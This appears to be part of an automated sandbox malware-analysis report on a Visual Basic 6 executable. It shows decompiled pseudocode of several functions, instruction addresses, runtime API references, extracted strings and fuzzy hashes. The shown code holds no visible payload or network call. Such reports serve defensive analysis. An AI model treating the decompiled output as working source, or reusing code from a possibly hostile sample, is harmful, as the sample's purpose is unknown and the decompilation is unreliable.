						_push(0x40f3cc);
						L0040185C();
						_v108 = 0x41b010;
					}
					_t170 =  &_v40;
					L00401862();
					_v72 = _t170;
					_t174 =  *((intOrPtr*)( *_v72 + 0x60))(_v72,  &_v64, _t170,  *((intOrPtr*)( *((intOrPtr*)( *_v108)) + 0x31c))( *_v108));
					asm("fclex");
					_v76 = _t174;
					if(_v76 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40e9ac);
						_push(_v72);
						_push(_v76);
						L00401856();
						_v112 = _t174;
					}
					if( *0x41b010 != 0) {
						_v116 = 0x41b010;
					} else {
						_push("p"w");
						_push(0x40f3cc);
						L0040185C();
						_v116 = 0x41b010;
					}
					_t211 =  *((intOrPtr*)( *_v116));
					_t178 =  &_v44;
					L00401862();
					_v80 = _t178;
					_t182 =  *((intOrPtr*)( *_v80 + 0x60))(_v80,  &_v68, _t178,  *((intOrPtr*)(_t211 + 0x310))( *_v116));
					asm("fclex");
					_v84 = _t182;
					if(_v84 >= 0) {
						_v120 = _v120 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40eb10);
						_push(_v80);
						_push(_v84);
						L00401856();
						_v120 = _t182;
					}
					_push(_t211);
					_v112 =  *0x4014b8;
					_t228 =  *0x4014b0 *  *0x4013f8;
					if( *0x41b000 != 0) {
						_push( *0x401384);
						_push( *0x401380);
						L00401604();
					} else {
						_t228 = _t228 /  *0x401380;
					}
					asm("fnstsw ax");
					if((_t182 & 0x0000000d) != 0) {
						return __imp____vbaFPException();
					}
					_v124 = _t228;
					_v128 =  *0x4014a8;
					L0040172A();
					_t232 =  *0x401498;
					_v136 = _t232;
					asm("fild dword [ebp-0x40]");
					_v128 = _t232;
					_t233 = _v128;
					_v140 = _t233;
					asm("fild dword [ebp-0x3c]");
					_v132 = _t233;
					_v144 = _v132;
					_t186 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t211, _t211, _t211, _t182, _t211, _t211);
					asm("fclex");
					_v88 = _t186;
					if(_v88 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x2c0);
						_push(0x40e734);
						_push(_a4);
						_push(_v88);
						L00401856();
						_v136 = _t186;
					}
					_push( &_v44);
					_push( &_v40);
					_push(2);
					L00401826();
					_t223 = _t223 + 0xc;
				}
				if( *0x41b010 != 0) {
					_v140 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v140 = 0x41b010;
				}
				_t154 =  &_v40;
				L00401862();
				_v72 = _t154;
				_v52 = _v52 & 0x00000000;
				_v60 = 2;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t158 =  *((intOrPtr*)( *_v72 + 0x1d4))(_v72, 0x10, _t154,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x34c))( *_v140));
				asm("fclex");
				_v76 = _t158;
				if(_v76 >= 0) {
					_v144 = _v144 & 0x00000000;
				} else {
					_push(0x1d4);
					_push(0x40eac4);
					_push(_v72);
					_push(_v76);
					L00401856();
					_v144 = _t158;
				}
				L00401850();
				if( *0x41b010 != 0) {
					_v148 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v148 = 0x41b010;
				}
				_t162 =  &_v40;
				L00401862();
				_v72 = _t162;
				_t166 =  *((intOrPtr*)( *_v72 + 0x58))(_v72,  &_v64, _t162,  *((intOrPtr*)( *((intOrPtr*)( *_v148)) + 0x304))( *_v148));
				asm("fclex");
				_v76 = _t166;
				if(_v76 >= 0) {
					_v152 = _v152 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x40ec28);
					_push(_v72);
					_push(_v76);
					L00401856();
					_v152 = _t166;
				}
				_v32 = _v64;
				L00401850();
				asm("wait");
				_push(0x41758a);
				L0040182C();
				return _t166;
			}

0x00417109
0x00417118
0x00417124
0x0041712c
0x0041712f
0x00417136
0x00417145
0x0041714e
0x0041715a
0x00417174
0x0041715c
0x0041715c
0x00417161
0x00417166
0x0041716b
0x0041716b
0x0041718f
0x00417193
0x00417198
0x0041719b
0x004171a2
0x004171ac
0x004171b6
0x004171b7
0x004171b8
0x004171b9
0x004171c2
0x004171c8
0x004171ca
0x004171d1
0x004171ed
0x004171d3
0x004171d3
0x004171d8
0x004171dd
0x004171e0
0x004171e3
0x004171e8
0x004171e8
0x004171f4
0x004171f9
0x004171fe
0x00417208
0x0041720d
0x0041720e
0x00417213
0x0041721a
0x00417220
0x00417227
0x00417232
0x0041723f
0x00417259
0x00417241
0x00417241
0x00417246
0x0041724b
0x00417250
0x00417250
0x00417274
0x00417278
0x0041727d
0x0041728c
0x0041728f
0x00417291
0x00417298
0x004172b1
0x0041729a
0x0041729a
0x0041729c
0x004172a1
0x004172a4
0x004172a7
0x004172ac
0x004172ac
0x004172bc
0x004172d6
0x004172be
0x004172be
0x004172c3
0x004172c8
0x004172cd
0x004172cd
0x004172e7
0x004172f1
0x004172f5
0x004172fa
0x00417309
0x0041730c
0x0041730e
0x00417315
0x0041732e
0x00417317
0x00417317
0x00417319
0x0041731e
0x00417321
0x00417324
0x00417329
0x00417329
0x00417338
0x00417339
0x00417342
0x0041734f
0x00417359
0x0041735f
0x00417365
0x00417351
0x00417351
0x00417351
0x0041736a
0x0041736e
0x004015ec
0x004015ec
0x00417374
0x00417385
0x0041738e
0x00417394
0x0041739b
0x0041739e
0x004173a1
0x004173a4
0x004173a8
0x004173ab
0x004173ae
0x004173b5
0x004173c5
0x004173cb
0x004173cd
0x004173d4
0x004173f3
0x004173d6
0x004173d6
0x004173db
0x004173e0
0x004173e3
0x004173e6
0x004173eb
0x004173eb
0x004173fd
0x00417401
0x00417402
0x00417404
0x00417409
0x00417409
0x00417413
0x00417430
0x00417415
0x00417415
0x0041741a
0x0041741f
0x00417424
0x00417424
0x00417454
0x00417458
0x0041745d
0x00417460
0x00417464
0x0041746e
0x00417478
0x00417479
0x0041747a
0x0041747b
0x00417484
0x0041748a
0x0041748c
0x00417493
0x004174b2
0x00417495
0x00417495
0x0041749a
0x0041749f
0x004174a2
0x004174a5
0x004174aa
0x004174aa
0x004174bc
0x004174c8
0x004174e5
0x004174ca
0x004174ca
0x004174cf
0x004174d4
0x004174d9
0x004174d9
0x00417509
0x0041750d
0x00417512
0x00417521
0x00417524
0x00417526
0x0041752d
0x00417549
0x0041752f
0x0041752f
0x00417531
0x00417536
0x00417539
0x0041753c
0x00417541
0x00417541
0x00417553
0x00417559
0x0041755e
0x0041755f
0x00417584
0x00417589

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00417124
__vbaStrCopy.MSVBVM60(?,?,?,?,004015E6), ref: 0041714E
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,004015E6), ref: 00417166
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417193
__vbaChkstk.MSVBVM60(?,00000000), ref: 004171AC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,00000174), ref: 004171E3
__vbaFreeObj.MSVBVM60(00000000,?,0040EAE4,00000174), ref: 004171F4
#519.MSVBVM60( tt), ref: 004171FE
__vbaStrMove.MSVBVM60( tt), ref: 00417208
__vbaStrCmp.MSVBVM60(0040ED54,00000000, tt), ref: 00417213
__vbaFreeStr.MSVBVM60(0040ED54,00000000, tt), ref: 00417227
__vbaNew2.MSVBVM60(0040F3CC,p"w,0040ED54,00000000, tt), ref: 0041724B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00417278
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040E9AC,00000060), ref: 004172A7
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 004172C8
__vbaObjSet.MSVBVM60(?,00000000), ref: 004172F5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EB10,00000060), ref: 00417324
_adj_fdiv_m64.MSVBVM60 ref: 00417365
__vbaFpI4.MSVBVM60 ref: 0041738E
__vbaHresultCheckObj.MSVBVM60(00000000,004014C0,0040E734,000002C0,?,?,?,00000000), ref: 004173E6
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,00000000), ref: 00417404
__vbaNew2.MSVBVM60(0040F3CC,p"w,0040ED54,00000000, tt), ref: 0041741F
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,0040ED54,00000000, tt), ref: 00417458
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,0040ED54,00000000, tt), ref: 0041746E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAC4,000001D4,?,?,?,?,?,?,?,0040ED54,00000000, tt), ref: 004174A5
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,0040ED54,00000000, tt), ref: 004174BC
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,?,?,?,0040ED54,00000000, tt), ref: 004174D4
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,0040ED54,00000000, tt), ref: 0041750D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EC28,00000058,?,?,?,?,?,?,?,?,?,0040ED54,00000000, tt), ref: 0041753C
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,0040ED54,00000000, tt), ref: 00417559
__vbaFreeStr.MSVBVM60(0041758A,?,?,?,?,?,?,?,?,?,0040ED54,00000000, tt), ref: 00417584

Strings

tt, xrefs: 004171F9
p"w, xrefs: 00417153, 0041715C, 0041716B, 00417174, 00417238, 00417241, 00417250, 00417259, 004172B5, 004172BE, 004172CD, 004172D6, 0041740C, 00417415, 00417424, 00417430, 004174C1, 004174CA, 004174D9, 004174E5

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$Chkstk$#519CopyListMove_adj_fdiv_m64
String ID: tt$p"w
API String ID: 3498078014-3695320508
Opcode ID: 8ad425beea5d403a45e2a35f3f41d7e83609009259cbac3d5d00e6e1d4dc135e
Instruction ID: 1ec0679810720ee678d0c12ae157aca9a9e71cfd3e995c958b8688e1e156ddcb
Opcode Fuzzy Hash: 8ad425beea5d403a45e2a35f3f41d7e83609009259cbac3d5d00e6e1d4dc135e
Instruction Fuzzy Hash: 63D13971A00208EFCB10EFA1C945BDDBBB5FF08304F20446AF456BB2A1DB795995DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00419631, Relevance: 56.3, APIs: 30, Strings: 2, Instructions: 346
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00419631(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				void* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				char _v56;
				char* _v64;
				intOrPtr _v72;
				char* _v80;
				intOrPtr _v88;
				char* _v96;
				intOrPtr _v104;
				short _v108;
				char _v112;
				char _v116;
				void* _v120;
				signed int _v124;
				intOrPtr* _v128;
				signed char _v132;
				signed int _v136;
				intOrPtr* _v148;
				signed int _v152;
				char _v156;
				char _v160;
				intOrPtr _v164;
				signed int _v168;
				char _v172;
				signed int _v176;
				intOrPtr* _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed char _v192;
				char _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				char* _t153;
				signed int _t157;
				char* _t161;
				signed char _t168;
				char* _t174;
				signed int _t177;
				char* _t178;
				char* _t179;
				char* _t183;
				signed int _t187;
				char* _t191;
				signed char _t195;
				signed int _t199;
				intOrPtr _t208;
				intOrPtr _t224;
				void* _t235;
				void* _t237;
				intOrPtr* _t238;
				intOrPtr* _t239;
				intOrPtr _t242;
				signed long long _t247;
				signed int _t251;
				signed int _t252;

				_t242 = __fp0;
				_t238 = _t237 - 0xc;
				 *[fs:0x0] = _t238;
				L004015E0();
				_v16 = _t238;
				_v12 = 0x4015b0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4015e6, _t235);
				L00401820();
				if( *0x41b010 != 0) {
					_v148 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v148 = 0x41b010;
				}
				_t153 =  &_v36;
				L00401862();
				_v120 = _t153;
				_t157 =  *((intOrPtr*)( *_v120 + 0x160))(_v120,  &_v108, _t153,  *((intOrPtr*)( *((intOrPtr*)( *_v148)) + 0x310))( *_v148));
				asm("fclex");
				_v124 = _t157;
				if(_v124 >= 0) {
					_v152 = _v152 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x40eb10);
					_push(_v120);
					_push(_v124);
					L00401856();
					_v152 = _t157;
				}
				if( *0x41b010 != 0) {
					_v156 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v156 = 0x41b010;
				}
				_t208 =  *((intOrPtr*)( *_v156));
				_t161 =  &_v40;
				L00401862();
				_v128 = _t161;
				_v96 = 0x80020004;
				_v104 = 0xa;
				_v80 = 0x80020004;
				_v88 = 0xa;
				_v64 = 0x80020004;
				_v72 = 0xa;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v108;
				asm("fild dword [ebp-0x9c]");
				_v164 = _t242;
				 *_t238 = _v164;
				_t168 =  *((intOrPtr*)( *_v128 + 0x224))(_v128, _t208, 0x10, 0x10, 0x10, _t161,  *((intOrPtr*)(_t208 + 0x330))( *_v156));
				asm("fclex");
				_v132 = _t168;
				if(_v132 >= 0) {
					_v168 = _v168 & 0x00000000;
				} else {
					_push(0x224);
					_push(0x40ea9c);
					_push(_v128);
					_push(_v132);
					L00401856();
					_v168 = _t168;
				}
				_push( &_v40);
				_push( &_v36);
				_push(2);
				L00401826();
				_t239 = _t238 + 0xc;
				if( *0x41b010 != 0) {
					_v172 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v172 = 0x41b010;
				}
				_t174 =  &_v36;
				L00401862();
				_v120 = _t174;
				_t177 =  *((intOrPtr*)( *_v120 + 0x180))(_v120, _t174,  *((intOrPtr*)( *((intOrPtr*)( *_v172)) + 0x300))( *_v172));
				asm("fclex");
				_v124 = _t177;
				if(_v124 >= 0) {
					_v176 = _v176 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x40eae4);
					_push(_v120);
					_push(_v124);
					L00401856();
					_v176 = _t177;
				}
				L00401850();
				_v64 = L"6/6/6";
				_v72 = 8;
				L004017AE();
				_t178 =  &_v56;
				_push(_t178);
				L0040171E();
				_v120 =  ~(0 | _t178 != 0x0000ffff);
				L00401838();
				_t179 = _v120;
				if(_t179 != 0) {
					if( *0x41b010 != 0) {
						_v180 = 0x41b010;
					} else {
						_push("p"w");
						_push(0x40f3cc);
						L0040185C();
						_v180 = 0x41b010;
					}
					_t183 =  &_v36;
					L00401862();
					_v120 = _t183;
					_t187 =  *((intOrPtr*)( *_v120 + 0x1a0))(_v120,  &_v112, _t183,  *((intOrPtr*)( *((intOrPtr*)( *_v180)) + 0x33c))( *_v180));
					asm("fclex");
					_v124 = _t187;
					if(_v124 >= 0) {
						_v184 = _v184 & 0x00000000;
					} else {
						_push(0x1a0);
						_push(0x40ea64);
						_push(_v120);
						_push(_v124);
						L00401856();
						_v184 = _t187;
					}
					if( *0x41b010 != 0) {
						_v188 = 0x41b010;
					} else {
						_push("p"w");
						_push(0x40f3cc);
						L0040185C();
						_v188 = 0x41b010;
					}
					_t224 =  *((intOrPtr*)( *_v188));
					_t191 =  &_v40;
					L00401862();
					_v128 = _t191;
					_t195 =  *((intOrPtr*)( *_v128 + 0x1a0))(_v128,  &_v116, _t191,  *((intOrPtr*)(_t224 + 0x318))( *_v188));
					asm("fclex");
					_v132 = _t195;
					if(_v132 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x1a0);
						_push(0x40ea8c);
						_push(_v128);
						_push(_v132);
						L00401856();
						_v192 = _t195;
					}
					_push(_t224);
					 *_t239 =  *0x4015a8;
					_t247 =  *0x4015a0 *  *0x4013f8;
					if( *0x41b000 != 0) {
						_push( *0x401384);
						_push( *0x401380);
						L00401604();
					} else {
						_t247 = _t247 /  *0x401380;
					}
					asm("fnstsw ax");
					if((_t195 & 0x0000000d) != 0) {
						return __imp____vbaFPException();
					}
					_v196 = _t247;
					_v156 = _v196;
					_v160 =  *0x401598;
					L0040172A();
					_t251 =  *0x40158c;
					_v168 = _t251;
					asm("fild dword [ebp-0x70]");
					_v200 = _t251;
					_t252 = _v200;
					_v172 = _t252;
					asm("fild dword [ebp-0x6c]");
					_v204 = _t252;
					_v176 = _v204;
					_t199 =  *((intOrPtr*)( *_a4 + 0x2c0))(_a4, 0x1c2, _t224, _t224, _t224, _t195, _t224, _t224);
					asm("fclex");
					_v136 = _t199;
					if(_v136 >= 0) {
						_v208 = _v208 & 0x00000000;
					} else {
						_push(0x2c0);
						_push(0x40e734);
						_push(_a4);
						_push(_v136);
						L00401856();
						_v208 = _t199;
					}
					_push( &_v40);
					_t179 =  &_v36;
					_push(_t179);
					_push(2);
					L00401826();
				}
				_v32 =  *0x401588;
				asm("wait");
				_push(0x419b65);
				L0040182C();
				return _t179;
			}

0x00419631
0x00419634
0x00419643
0x0041964f
0x00419657
0x0041965a
0x00419661
0x00419670
0x00419679
0x00419685
0x004196a2
0x00419687
0x00419687
0x0041968c
0x00419691
0x00419696
0x00419696
0x004196c6
0x004196ca
0x004196cf
0x004196de
0x004196e4
0x004196e6
0x004196ed
0x0041970c
0x004196ef
0x004196ef
0x004196f4
0x004196f9
0x004196fc
0x004196ff
0x00419704
0x00419704
0x0041971a
0x00419737
0x0041971c
0x0041971c
0x00419721
0x00419726
0x0041972b
0x0041972b
0x00419751
0x0041975b
0x0041975f
0x00419764
0x00419767
0x0041976e
0x00419775
0x0041977c
0x00419783
0x0041978a
0x00419794
0x0041979e
0x0041979f
0x004197a0
0x004197a1
0x004197a5
0x004197af
0x004197b0
0x004197b1
0x004197b2
0x004197b6
0x004197c0
0x004197c1
0x004197c2
0x004197c3
0x004197c8
0x004197ce
0x004197d4
0x004197e1
0x004197ec
0x004197f2
0x004197f4
0x004197fb
0x0041981a
0x004197fd
0x004197fd
0x00419802
0x00419807
0x0041980a
0x0041980d
0x00419812
0x00419812
0x00419824
0x00419828
0x00419829
0x0041982b
0x00419830
0x0041983a
0x00419857
0x0041983c
0x0041983c
0x00419841
0x00419846
0x0041984b
0x0041984b
0x0041987b
0x0041987f
0x00419884
0x0041988f
0x00419895
0x00419897
0x0041989e
0x004198bd
0x004198a0
0x004198a0
0x004198a5
0x004198aa
0x004198ad
0x004198b0
0x004198b5
0x004198b5
0x004198c7
0x004198cc
0x004198d3
0x004198e0
0x004198e5
0x004198e8
0x004198e9
0x004198f9
0x00419900
0x00419905
0x0041990b
0x00419918
0x00419935
0x0041991a
0x0041991a
0x0041991f
0x00419924
0x00419929
0x00419929
0x00419959
0x0041995d
0x00419962
0x00419971
0x00419977
0x00419979
0x00419980
0x0041999f
0x00419982
0x00419982
0x00419987
0x0041998c
0x0041998f
0x00419992
0x00419997
0x00419997
0x004199ad
0x004199ca
0x004199af
0x004199af
0x004199b4
0x004199b9
0x004199be
0x004199be
0x004199e4
0x004199ee
0x004199f2
0x004199f7
0x00419a06
0x00419a0c
0x00419a0e
0x00419a15
0x00419a34
0x00419a17
0x00419a17
0x00419a1c
0x00419a21
0x00419a24
0x00419a27
0x00419a2c
0x00419a2c
0x00419a41
0x00419a42
0x00419a4b
0x00419a58
0x00419a62
0x00419a68
0x00419a6e
0x00419a5a
0x00419a5a
0x00419a5a
0x00419a73
0x00419a77
0x004015ec
0x004015ec
0x00419a7d
0x00419a8a
0x00419a94
0x00419a9d
0x00419aa3
0x00419aaa
0x00419aad
0x00419ab0
0x00419ab6
0x00419abd
0x00419ac0
0x00419ac3
0x00419ad0
0x00419ae0
0x00419ae6
0x00419ae8
0x00419af5
0x00419b17
0x00419af7
0x00419af7
0x00419afc
0x00419b01
0x00419b04
0x00419b0a
0x00419b0f
0x00419b0f
0x00419b21
0x00419b22
0x00419b25
0x00419b26
0x00419b28
0x00419b2d
0x00419b36
0x00419b39
0x00419b3a
0x00419b5f
0x00419b64

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 0041964F
__vbaStrCopy.MSVBVM60(?,?,?,?,004015E6), ref: 00419679
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,004015E6), ref: 00419691
__vbaObjSet.MSVBVM60(?,00000000), ref: 004196CA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EB10,00000160), ref: 004196FF
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00419726
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041975F
__vbaChkstk.MSVBVM60(?,00000000), ref: 00419794
__vbaChkstk.MSVBVM60(?,00000000), ref: 004197A5
__vbaChkstk.MSVBVM60(?,00000000), ref: 004197B6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA9C,00000224,?,?,00000000), ref: 0041980D
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,00000000), ref: 0041982B
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,004015E6), ref: 00419846
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041987F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,00000180), ref: 004198B0
__vbaFreeObj.MSVBVM60 ref: 004198C7
__vbaVarDup.MSVBVM60 ref: 004198E0
#557.MSVBVM60(?), ref: 004198E9
__vbaFreeVar.MSVBVM60(?), ref: 00419900
__vbaNew2.MSVBVM60(0040F3CC,p"w,?), ref: 00419924
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041995D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA64,000001A0), ref: 00419992
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 004199B9
__vbaObjSet.MSVBVM60(?,00000000), ref: 004199F2
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA8C,000001A0), ref: 00419A27
_adj_fdiv_m64.MSVBVM60 ref: 00419A6E
__vbaFpI4.MSVBVM60 ref: 00419A9D
__vbaHresultCheckObj.MSVBVM60(00000000,004015B0,0040E734,000002C0,?,?,?,00000000), ref: 00419B0A
__vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,?,00000000), ref: 00419B28
__vbaFreeStr.MSVBVM60(00419B65,?), ref: 00419B5F

Strings

p"w, xrefs: 0041967E, 00419687, 00419696, 004196A2, 00419713, 0041971C, 0041972B, 00419737, 00419833, 0041983C, 0041984B, 00419857, 00419911, 0041991A, 00419929, 00419935, 004199A6, 004199AF, 004199BE, 004199CA
6/6/6, xrefs: 004198CC

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2$Chkstk$List$#557Copy_adj_fdiv_m64
String ID: 6/6/6$p"w
API String ID: 3917400660-2586723623
Opcode ID: 9371db3412b98ad794dff14e0f8016f0864e0e27ca067ea3871bff98bb197e7f
Instruction ID: ff45f76ef82ed9d2ef3298e676c3af78282067502916217b07d2010f41df5224
Opcode Fuzzy Hash: 9371db3412b98ad794dff14e0f8016f0864e0e27ca067ea3871bff98bb197e7f
Instruction Fuzzy Hash: 4DE14C71A00208DFDB10EFA1C845BDDBBB5FF08304F2044AAE149BB2A1D7795A84DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004156DD, Relevance: 51.0, APIs: 26, Strings: 3, Instructions: 237
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E004156DD(void* __ebx, void* __ecx, void* __edi, void* __esi, long long __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				long long _v28;
				short _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v64;
				intOrPtr _v72;
				void* _v76;
				void* _v80;
				signed int _v84;
				signed int _v92;
				intOrPtr* _v96;
				signed int _v100;
				intOrPtr* _v104;
				signed int _v108;
				intOrPtr* _v112;
				signed int _v116;
				intOrPtr* _v120;
				signed int _v124;
				char* _t108;
				signed int _t112;
				signed int _t113;
				char* _t121;
				signed int _t125;
				char* _t129;
				signed int _t133;
				short _t134;
				char* _t138;
				signed int _t142;
				intOrPtr _t177;
				long long _t188;

				_t188 = __fp0;
				_push(0x4015e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t177;
				_push(0x68);
				L004015E0();
				_v12 = _t177;
				_v8 = 0x4013a0;
				if( *0x41b010 != 0) {
					_v96 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v96 = 0x41b010;
				}
				_t108 =  &_v40;
				L00401862();
				_v80 = _t108;
				_v64 = 0x80020004;
				_v72 = 0xa;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t112 =  *((intOrPtr*)( *_v80 + 0x1ec))(_v80, L"Subhexagonal", 0x10, _t108,  *((intOrPtr*)( *((intOrPtr*)( *_v96)) + 0x318))( *_v96));
				asm("fclex");
				_v84 = _t112;
				if(_v84 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x1ec);
					_push(0x40ea8c);
					_push(_v80);
					_push(_v84);
					L00401856();
					_v100 = _t112;
				}
				L00401850();
				_v48 = 0x4b;
				_v56 = 2;
				_t113 =  &_v56;
				_push(_t113);
				L00401766();
				L00401814();
				_push(_t113);
				_push(0x40edf4);
				L00401772();
				asm("sbb eax, eax");
				_v80 =  ~( ~( ~_t113));
				L0040182C();
				L00401838();
				if(_v80 != 0) {
					if( *0x41b010 != 0) {
						_v104 = 0x41b010;
					} else {
						_push("p"w");
						_push(0x40f3cc);
						L0040185C();
						_v104 = 0x41b010;
					}
					_t138 =  &_v40;
					L00401862();
					_v80 = _t138;
					_t142 =  *((intOrPtr*)( *_v80 + 0xa0))(_v80,  &_v36, _t138,  *((intOrPtr*)( *((intOrPtr*)( *_v104)) + 0x328))( *_v104));
					asm("fclex");
					_v84 = _t142;
					if(_v84 >= 0) {
						_v108 = _v108 & 0x00000000;
					} else {
						_push(0xa0);
						_push(0x40ea9c);
						_push(_v80);
						_push(_v84);
						L00401856();
						_v108 = _t142;
					}
					_v92 = _v36;
					_v36 = _v36 & 0x00000000;
					_v48 = _v92;
					_v56 = 8;
					_push(2);
					_push( &_v56);
					L00401760();
					_v28 = _t188;
					L00401850();
					L00401838();
				}
				if( *0x41b010 != 0) {
					_v112 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v112 = 0x41b010;
				}
				_t121 =  &_v40;
				L00401862();
				_v80 = _t121;
				_v64 = 0x80020004;
				_v72 = 0xa;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t125 =  *((intOrPtr*)( *_v80 + 0x1b0))(_v80, 0x10, _t121,  *((intOrPtr*)( *((intOrPtr*)( *_v112)) + 0x31c))( *_v112));
				asm("fclex");
				_v84 = _t125;
				if(_v84 >= 0) {
					_v116 = _v116 & 0x00000000;
				} else {
					_push(0x1b0);
					_push(0x40e9ac);
					_push(_v80);
					_push(_v84);
					L00401856();
					_v116 = _t125;
				}
				L00401850();
				if( *0x41b010 != 0) {
					_v120 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v120 = 0x41b010;
				}
				_t129 =  &_v40;
				L00401862();
				_v80 = _t129;
				_t133 =  *((intOrPtr*)( *_v80 + 0xa0))(_v80,  &_v76, _t129,  *((intOrPtr*)( *((intOrPtr*)( *_v120)) + 0x2fc))( *_v120));
				asm("fclex");
				_v84 = _t133;
				if(_v84 >= 0) {
					_v124 = _v124 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x40eae4);
					_push(_v80);
					_push(_v84);
					L00401856();
					_v124 = _t133;
				}
				_t134 = _v76;
				_v32 = _t134;
				L00401850();
				asm("wait");
				_push(0x415a1c);
				return _t134;
			}

0x004156dd
0x004156e2
0x004156ed
0x004156ee
0x004156f5
0x004156f8
0x00415700
0x00415703
0x00415711
0x0041572b
0x00415713
0x00415713
0x00415718
0x0041571d
0x00415722
0x00415722
0x00415746
0x0041574a
0x0041574f
0x00415752
0x00415759
0x00415763
0x0041576d
0x0041576e
0x0041576f
0x00415770
0x0041577e
0x00415784
0x00415786
0x0041578d
0x004157a9
0x0041578f
0x0041578f
0x00415794
0x00415799
0x0041579c
0x0041579f
0x004157a4
0x004157a4
0x004157b0
0x004157b5
0x004157bc
0x004157c3
0x004157c6
0x004157c7
0x004157d1
0x004157d6
0x004157d7
0x004157dc
0x004157e3
0x004157e9
0x004157f0
0x004157f8
0x00415803
0x00415810
0x0041582a
0x00415812
0x00415812
0x00415817
0x0041581c
0x00415821
0x00415821
0x00415845
0x00415849
0x0041584e
0x0041585d
0x00415863
0x00415865
0x0041586c
0x00415888
0x0041586e
0x0041586e
0x00415873
0x00415878
